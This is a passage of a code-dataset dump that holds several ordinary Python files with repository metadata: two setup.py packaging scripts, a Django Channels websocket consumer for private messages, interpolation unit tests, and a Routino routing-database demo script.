] | 1 | 2022-02-18T01:23:46.000Z | 2022-02-18T01:23:46.000Z | ## Copyright © 2021, Oracle and/or its affiliates.
## Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
#!/usr/bin/env python
from setuptools import setup

setup(name='wind-marketplace-library',
      version="1.0.0",
      description='Robot Framework test library for OCI Marketplace',
      long_description='Robot Framework test library for OCI Marketplace',
      classifiers=[
          'Operating System :: OS Independent',
          'Programming Language :: Python',
          'Programming Language :: Python :: 3.6',
          'Framework :: WIND Robot Framework',
      ],
      author='arun.poonia@oracle.com',
      author_email='arun.poonia@oracle.com',
      packages=['MarketplaceLibrary'],
      license="UPL-1.0",
      install_requires=[
      ],
      extras_require={
          'dev': [
          ]
      },
      platforms='any',
      include_package_data=True,
      zip_safe=False)
| 31.8 | 105 | 0.634172 | 108 | 954 | 5.546296 | 0.685185 | 0.010017 | 0.083472 | 0.096828 | 0.176962 | 0.176962 | 0.176962 | 0.176962 | 0 | 0 | 0 | 0.018006 | 0.243187 | 954 | 30 | 106 | 31.8 | 0.810249 | 0.179245 | 0 | 0.083333 | 0 | 0 | 0.429306 | 0.087404 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fdb320f11ce21ba2207772e25516617a4f09f64 | 310 | py | Python | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 12 | 2015-07-28T15:31:51.000Z | 2019-03-03T23:39:10.000Z | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 4 | 2017-01-25T05:24:17.000Z | 2019-04-03T00:25:13.000Z | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 33 | 2015-01-07T10:01:28.000Z | 2020-07-26T08:22:53.000Z | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
from setuptools import setup
import setuptools

setup(
    name='contrail-server-manager',
    version='0.1dev',
    packages=setuptools.find_packages(exclude=["*.pyc"]),
    zip_safe=False,
    long_description="Server Manager package",
)
| 20.666667 | 64 | 0.716129 | 37 | 310 | 5.918919 | 0.810811 | 0.118721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022989 | 0.158065 | 310 | 14 | 65 | 22.142857 | 0.816092 | 0.2 | 0 | 0 | 0 | 0 | 0.229508 | 0.094262 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.222222 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fdd8bc73e2b49aa962aeebacd2ae774e4162d17 | 1,013 | py | Python | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | null | null | null | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | 12 | 2020-02-12T01:14:42.000Z | 2022-03-11T23:54:43.000Z | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
# @Time : 2019/7/21 12:35 PM
# @Author : __wutonghe__
# docs https://channels.readthedocs.io/en/latest/tutorial/part_3.html#rewrite-the-consumer-to-be-asynchronous
from channels.generic.websocket import AsyncWebsocketConsumer
import json


class MessageConsumer(AsyncWebsocketConsumer):
    """
    Private-message websocket; uses asynchronous communication for higher concurrency.
    """

    async def connect(self):
        """Triggered as soon as a websocket connection is established."""
        if self.scope['user'].is_anonymous:
            await self.close()
        else:
            await self.channel_layer.group_add(self.scope['user'].username + '-message', self.channel_name)  # create the chat room
            await self.accept()

    async def receive(self, text_data=None, bytes_data=None):
        """Hand the reply back to the websocket."""
        await self.send(text_data=json.dumps(text_data))  # send the message to the frontend

    async def disconnect(self, code):
        """Triggered when the connection is closed."""
        await self.channel_layer.group_discard(self.scope['user'].username + '-message', self.channel_name)  # remove this connection from the chat room
| 30.69697 | 119 | 0.669299 | 119 | 1,013 | 5.563025 | 0.638655 | 0.067976 | 0.058912 | 0.063444 | 0.208459 | 0.129909 | 0.129909 | 0.129909 | 0 | 0 | 0 | 0.01599 | 0.197433 | 1,013 | 32 | 120 | 31.65625 | 0.798278 | 0.228036 | 0 | 0 | 0 | 0 | 0.040404 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fe090a4e22c0963ebcb0f7db477cda0fa848e0e | 2,618 | py | Python | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | import eagerpy as ep
import numpy as np
from scipy.interpolate import RegularGridInterpolator
import hypney
tl = ep.numpy
def test_regular_grid_interpolator():
"""Adapted from
https://github.com/sbarratt/torch_interpolations/blob/master/tests/test_grid_interpolator.py
"""
points = [tl.arange(-0.5, 2.5, 0.1) * 1.0, tl.arange(-0.5, 2.5, 0.2) * 1.0]
values = (
hypney.utils.eagerpy.sin(points[0])[:, None]
+ 2 * hypney.utils.eagerpy.cos(points[1])[None, :]
+ hypney.utils.eagerpy.sin(5 * points[0][:, None] @ points[1][None, :])
)
X, Y = ep.meshgrid(tl.arange(-0.5, 2, 0.1), tl.arange(-0.5, 2, 0.1))
points_to_interp = ep.stack([X.flatten(), Y.flatten()]).T
gi = hypney.utils.interpolation.RegularGridInterpolator(points, values)
fx = gi(points_to_interp)
rgi = RegularGridInterpolator(
[p.numpy() for p in points], [x.numpy() for x in values], bounds_error=False
)
rfx = rgi(points_to_interp.numpy())
np.testing.assert_allclose(rfx, fx.numpy(), atol=1e-6)
# TODO: port derivative test to eagerpy
# note that points_to_interp has to be transposed
#
# def test_regular_grid_interpolator_derivative():
# points = [torch.arange(-.5, 2.5, .5) * 1., torch.arange(-.5, 2.5, .5) * 1.]
# values = torch.sin(points[0])[:, None] + 2 * torch.cos(points[1])[None, :] + torch.sin(5 * points[0][:, None] @ points[1][None, :])
# values.requires_grad_(True)
#
# X, Y = np.meshgrid(np.arange(-.5, 2, .19), np.arange(-.5, 2, .19))
# points_to_interp = [torch.from_numpy(
# X.flatten()).float(), torch.from_numpy(Y.flatten()).float()]
#
# def f(values):
# return torch_interpolations.RegularGridInterpolator(
# points, values)(points_to_interp)
#
# torch.autograd.gradcheck(f, (values,), eps=1e-5, atol=1e-1, rtol=1e-1)
def test_interpolator_builder():
itp = hypney.utils.interpolation.InterpolatorBuilder([(-1, 0, 1)])
def scalar_f(z):
return z[0]
z = ep.astensor(np.array([1, 0, -1, 0, 1, 1, -1]))
scalar_itp = itp.make_interpolator(scalar_f)
np.testing.assert_array_equal(scalar_itp(z).numpy(), z.numpy())
def matrix_f(z):
return ep.astensor(np.ones((2, 2)) * z[0])
matrix_itp = itp.make_interpolator(matrix_f)
np.testing.assert_array_equal(
matrix_itp(z).numpy(), z[:, None, None].numpy() * np.ones((1, 2, 2))
)
# What happened here? Does the test not make sense or did the API change?
# np.testing.assert_array_equal(
# matrix_itp(ep.numpy.array([0, 0, 0])).numpy(),
# np.ones((2, 2)))
| 33.564103 | 137 | 0.632544 | 394 | 2,618 | 4.081218 | 0.266497 | 0.00995 | 0.052239 | 0.024876 | 0.214552 | 0.143657 | 0.126866 | 0.032338 | 0 | 0 | 0 | 0.040566 | 0.190222 | 2,618 | 77 | 138 | 34 | 0.717925 | 0.399924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 0.088235 | 1 | 0.117647 | false | 0 | 0.117647 | 0.058824 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fe12a816ae34998a3fcf2329f909ed39bda660d | 8,451 | py | Python | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | 1 | 2016-02-12T20:26:31.000Z | 2016-02-12T20:26:31.000Z | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | 2 | 2019-01-16T10:00:19.000Z | 2019-02-03T10:53:32.000Z | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | null | null | null | #!/usr/bin/python3
##########################################
# Routino database access from Python.
#
# Part of the Routino routing software.
##########################################
# This file Copyright 2018 Andrew M. Bishop
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
##########################################

import routino.database

# Database, access all attributes

database = routino.database.LoadDatabase("../../src/test/fat", "turns")

if database is None:
    database = routino.database.LoadDatabase("../src/test/fat", "turns")

if database is None:
    print("Failed to load database")
    exit(1)

print(database)

database_attrs = ['nnodes', 'nsegments', 'nways', 'nrelations']

for attr in database_attrs:
    print(" Attribute: " + attr + " =", getattr(database, attr))

print("")

# A single node, access all attributes and all functions

node = database.GetNode(0)

print("1st node =", node)

node_attrs = ['id', 'firstsegment', 'latitude', 'longitude', 'allow', 'flags']
node_infos = ['', '', 'degrees', 'degrees', '[note 1]', '[note 2]']

for attr, info in zip(node_attrs, node_infos):
    print(" Attribute: " + attr + " =", getattr(node, attr), info)

segments = node.Segments()
print(" Function: " + "Segments()" + " = [" + ", ".join([str(segments[x]) for x in range(len(segments))]) + "]")

print("")

# A single segment, access all attributes and all functions

segment = database.GetSegment(0)

print("1st segment =", segment)

segment_attrs = ['id', 'node1', 'node2', 'next2', 'way', 'distance', 'flags']
segment_infos = ['', '', '', '', '', 'km', '[note 3]']

for attr, info in zip(segment_attrs, segment_infos):
    print(" Attribute: " + attr + " =", getattr(segment, attr), info)

print(" Function: " + "Node1()" + " = " + str(segment.Node1()))
print(" Function: " + "Node2()" + " = " + str(segment.Node2()))
print(" Function: " + "Way()" + " = " + str(segment.Way()))

print("")

# A single way, access all attributes and all functions

way = database.GetWay(0)

print("1st way =", way)

way_attrs = ['id', 'name', 'allow', 'type', 'props', 'speed', 'weight', 'height', 'width', 'length']
way_infos = ['', '', '[note 1]', '[note 4]', '[note 5]', 'km/hr [note 6]', 'tonnes [note 6]', 'metres [note 6]', 'metres [note 6]', 'metres [note 6]']

for attr, info in zip(way_attrs, way_infos):
    print(" Attribute: " + attr + " =", getattr(way, attr), info)

print("")

# A single relation, access all attributes and all functions

relation = database.GetRelation(0)

print("1st relation =", relation)

relation_attrs = ['id', 'from_seg', 'via_node', 'to_seg', 'from_way', 'to_way', 'from_node', 'to_node', 'except_transport']
relation_infos = ['', '', '', '', '', '', '', '', '[note 7]']

for attr, info in zip(relation_attrs, relation_infos):
    print(" Attribute: " + attr + " =", getattr(relation, attr), info)

print(" Function: " + "FromSegment()" + " = " + str(relation.FromSegment()))
print(" Function: " + "ViaNode()" + " = " + str(relation.ViaNode()))
print(" Function: " + "ToSegment()" + " = " + str(relation.ToSegment()))
print(" Function: " + "FromWay()" + " = " + str(relation.FromWay()))
print(" Function: " + "ToWay()" + " = " + str(relation.ToWay()))
print(" Function: " + "FromNode()" + " = " + str(relation.FromNode()))
print(" Function: " + "ToNode()" + " = " + str(relation.ToNode()))

print("")

# The list of nodes as a list and an iterable (just the first 4)

nodes = database.Nodes()
print("len(database.Nodes()) = " + str(len(nodes)))
print("database.Nodes() = [" + ", ".join([str(nodes[x]) for x in range(4)]) + ", ...]")

for node in nodes:
    if node.id == 4:
        break
    print(node)

print("")

# The list of segments as a list and an iterable (just the first 4)

segments = database.Segments()
print("len(database.Segments()) = " + str(len(segments)))
print("database.Segments() = [" + ", ".join([str(segments[x]) for x in range(4)]) + ", ...]")

for segment in segments:
    if segment.id == 4:
        break
    print(segment)

print("")

# The list of ways as a list and an iterable (just the first 4)

ways = database.Ways()
print("len(database.Ways()) = " + str(len(ways)))
print("database.Ways() = [" + ", ".join([str(ways[x]) for x in range(4)]) + ", ...]")

for way in ways:
    if way.id == 4:
        break
    print(way)

print("")

# The list of relations as a list and an iterable (just the first 4)

relations = database.Relations()
print("len(database.Relations()) = " + str(len(relations)))
print("database.Relations() = [" + ", ".join([str(relations[x]) for x in range(4)]) + ", ...]")

for relation in relations:
    if relation.id == 4:
        break
    print(relation)

print("")

# Enumerated lists

transports_enum = ["Transports_None",
                   "Transports_Foot",
                   "Transports_Horse",
                   "Transports_Wheelchair",
                   "Transports_Bicycle",
                   "Transports_Moped",
                   "Transports_Motorcycle",
                   "Transports_Motorcar",
                   "Transports_Goods",
                   "Transports_HGV",
                   "Transports_PSV",
                   "Transports_ALL"]

nodeflags_enum = ["Nodeflag_Super",
                  "Nodeflag_U_Turn",
                  "Nodeflag_Mini_Roundabout",
                  "Nodeflag_Turn_Restrict",
                  "Nodeflag_Turn_Restrict2"]

segmentflags_enum = ["Segmentflag_Area",
                     "Segmentflag_Oneway_1to2",
                     "Segmentflag_Oneway_2to1",
                     "Segmentflag_Super",
                     "Segmentflag_Normal"]

properties_enum = ["Properties_None",
                   "Properties_Paved",
                   "Properties_Multilane",
                   "Properties_Bridge",
                   "Properties_Tunnel",
                   "Properties_FootRoute",
                   "Properties_BicycleRoute",
                   "Properties_ALL"]

highway_enum = ["Highway_Motorway",
                "Highway_Trunk",
                "Highway_Primary",
                "Highway_Secondary",
                "Highway_Tertiary",
                "Highway_Unclassified",
                "Highway_Residential",
                "Highway_Service",
                "Highway_Track",
                "Highway_Cycleway",
                "Highway_Path",
                "Highway_Steps",
                "Highway_Ferry",
                "Highway_Count",
                "Highway_CycleBothWays",
                "Highway_OneWay",
                "Highway_Roundabout",
                "Highway_Area"]


def print_enum(list):
    for item in list:
        print(" routino.database." + item)


print("Note 1: The Node's and Way's 'allow' parameter can be the combination of these enumerated values:")
print_enum(transports_enum)
print("")

print("Note 2: The Node's 'flags' parameter can be the combination of these enumerated values:")
print_enum(nodeflags_enum)
print("")

print("Note 3: The Segment's 'flags' parameter can be the combination of these enumerated values:")
print_enum(segmentflags_enum)
print("")

print("Note 4: The Way's 'type' parameter can be one the combination of these enumerated values:")
print_enum(highway_enum)
print("")

print("Note 5: The Way's 'props' parameter can be the combination of these enumerated values:")
print_enum(properties_enum)
print("")

print("Note 6: A value of zero for a Way's speed, weight, height, width or length means that there is no limit.")
print("")

print("Note 7: The Relation's 'except_transport' parameter can be the combination of these enumerated values:")
print_enum(transports_enum)
print("")

import gc
gc.collect()
| 30.956044 | 156 | 0.587504 | 964 | 8,451 | 5.047718 | 0.254149 | 0.029388 | 0.017263 | 0.025894 | 0.254829 | 0.217016 | 0.182491 | 0.15783 | 0.140567 | 0.126182 | 0 | 0.009107 | 0.246361 | 8,451 | 272 | 157 | 31.069853 | 0.754907 | 0.153591 | 0 | 0.152866 | 0 | 0.019108 | 0.363481 | 0.03872 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006369 | false | 0 | 0.012739 | 0 | 0.019108 | 0.414013 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |